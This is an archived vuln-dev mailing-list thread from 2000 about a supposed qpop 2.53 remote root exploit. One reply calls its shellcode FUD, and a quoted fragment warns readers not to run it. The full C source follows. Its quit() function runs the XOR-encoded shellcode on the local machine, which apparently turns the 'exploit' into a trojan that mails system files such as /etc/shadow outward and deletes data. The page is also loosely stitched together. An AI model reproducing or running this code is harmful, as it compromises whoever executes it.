Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: QPOP2.5* exploit ??

From: mixter () NEWYORKOFFICE COM (Martin Ixter)
Date: Mon, 15 May 2000 01:32:53 +0300

hmm, to be honest, that sounds like FUD to me... the supposed shellcode
doesn't seem to contain x86 commands that make much sense... the first few
bytes resemble x86 instructions pusha and testl, after that there are no
consistent instructions following... the cat -v output follows, doesn't look
like valid x86 shellcode to me. can you provide the full exploit to verify
which command this program supposedly tries to overflow?

M-k^M-kM-hM-xM-^?M-^?M-^?^@M-F1M-If^@^@M-k3-`kl-qj/a^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@-q`kl-kdamldke"/c"~"ockn"/q"qmnucp"gvamulxBjmvockn,amo"<<"-fgt-lwnn9"gajm"%)")%"<<"|pmmv-,pjmqvq9"par"nrBqikllgp,vpfnli,amo8-wqp-qrmmn-nr-omfgn-qmnucp,vcp"qmnucp,vcp9"vcp"/ztd"qmnucp("<<"-fgt-lwnn9"af"qmnucp9"ajomf")z"qmnucp,qj9",-qmnucp,qj"<<"-fgt-lwnn9"af",,9"po"/pd"qmnucp(9^@M-ne)W^@M-g^@M-nTQM-jY^@AM-5^@M-1M-lyy^@wM-r^@^@M-lyy^@GM-v^@^@"M-lyy^@GM-zM-EG^@^@OM-rM-:
3^@Q^@M-qI^@3A^@gM-jY\EA^@^@

PS: but upgrading to qpop 3 is a good idea anyways (as long as people
upgrade to the latest secure version)

________________________
mixter () newyorkoffice com
http://1337.tsx.org

be safe. I
would not reccomend running this on your own machine unless you crack the shellcode and see what it does.


bat

/*  PRIVATE!!!!!!!!! DONT DISTRIBUTE!!!!! PRIVATE!!!!!!!!!
 *
 *
 *  qpop 2.53 remote root exploit for linux
 *  tested on redhat 6.x and 5.x, and slack7
 *  offsets for redhat 6: 100
 *  redhat 5: 150
 *
 *  slackware: 200
 *
 * these offsets were an average, however the buffer is small and
 * the address must almost be exact.  Perhaps try a offset brute forcer.
 *
 * code by John Slockavich, copyright Febuary 25th, 2000
 * this code for educational purposes only
 *
 *
 *
 * If this exploit is successful, you should have a bindshell on port 1524
 */


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>
#include <linux/ip.h>


#define RET 0xbffff6b2
#define NOP 0x90
#define PORT 110
#define BSIZE 512


int (*qpop_proc)();
void quit(int x);

char shellcode[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x8c\x01\x8
0\x36\x02\x46\xe2\xfa"
"\xeb\x33\x03\x02\x02\x2d\x60\x6b\x6c\x2d\x71\x6a\x02\x2f"
"\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x2d"
"\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f\x63\x22\x7e\x22"
"\x6f\x63\x6b\x6e\x22\x2f\x71\x22\x71\x6d\x6e\x75\x63\x70\x22\x67\x76\x61\x6d"
"\x75\x6c\x78\x42\x6a\x6d\x76\x6f\x63\x6b\x6e\x2c\x61\x6d\x6f\x22\x3c\x3c\x22"
"\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x22\x67\x61\x6a\x6d\x22\x25\x29\x22"
"\x29\x25\x22\x3c\x3c\x22\x7c\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76\x71"
"\x39\x22\x70\x61\x72\x22\x6e\x72\x42\x71\x69\x6b\x6c\x6c\x67\x70\x2c\x76\x70"
"\x66\x6e\x6c\x69\x2c\x61\x6d\x6f\x38\x2d\x77\x71\x70\x2d\x71\x72\x6d\x6d\x6e"
"\x2d\x6e\x72\x2d\x6f\x6d\x66\x67\x6e\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63"
"\x70\x22\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63\x70\x39\x22\x76\x63\x70\x22\x2f"
"\x7a\x74\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x22\x3c\x3c\x22\x2d\x66\x67\x74"
"\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x71\x6d\x6e\x75\x63\x70\x39\x22\x61"
"\x6a\x6f\x6d\x66\x22\x29\x7a\x22\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x39\x22"
"\x2c\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x22\x3c\x3c\x22\x2d\x66\x67\x74"
"\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x2c\x2c\x39\x22\x70\x6f\x22\x2f\x70"
"\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x39\x02\x83\xee\x65\x29\x02\x02\x57\x8b"
"\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83\xc1\xb5\x12\x02\x02\x8f"
"\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd\xfd\x8b\x47\xf6\x8f\x81"
"\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02\x02\x8f\x4f\xf2\xba\x09"
"\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f\x67\xea\x59\x5c\xcb\xc1"
"\x92\x92";




void usage(char *name)
 {
      fprintf(stderr,"qpop 2.53 exploit by John Slockavich\n"
                     "Usage: %s <hostname> <offset>\n"
                      , name);
      exit(1);
 }

int main(int argc, char **argv)
{

  struct sockaddr_in sin;
  struct hostent     *he;
  char               *hostname, *ptr, *buff;
  char               sendbuf[BSIZE+20];
  long               *addr_ptr, addr;
  int                 rfd;
  int                 sfd;
  int                 i;
  int                 offset = 0;



   if (argc < 2)
                usage(argv[0]);
 hostname = argv[1];
 if (argv[2])
            offset = atoi(argv[2]);

(char *)qpop_proc = shellcode;
if (!(buff = malloc(BSIZE))) {
    perror("malloc");
    exit(0);
  }

  sin.sin_family = AF_INET;
  sin.sin_port = htons(PORT);
  if ((he = gethostbyname(hostname)) == NULL)  {
       herror("resolve");
       exit(0);
   }
   bcopy(he->h_addr, (struct in_addr *)&sin.sin_addr, he->h_length);


   if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
            perror("socket");
            exit(1);
  }

 if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
           perror("socket");
           exit(1);
  }

  addr = RET - offset;
  printf("preparing buffer using addr 0x%x\n", addr);


  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < BSIZE; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < BSIZE/2; i++)
    buff[i] = NOP;

  ptr = buff + ((BSIZE/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[BSIZE - 1] = '\0';

  if (connect(sfd, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("connect");
        quit(1);
 }
  printf("connected, sending shellcode...\n");
  snprintf(sendbuf, sizeof(sendbuf)-1,"USER %s\n",buff);

if (write(sfd, sendbuf, strlen(sendbuf)) < 0) {
        perror("write");
        quit(1);
}
 close(sfd);
 quit(0);
}

void quit(int x)
{
     qpop_proc();
     exit(x);
}
Previous By Date Next
Previous By Thread Next

Current thread: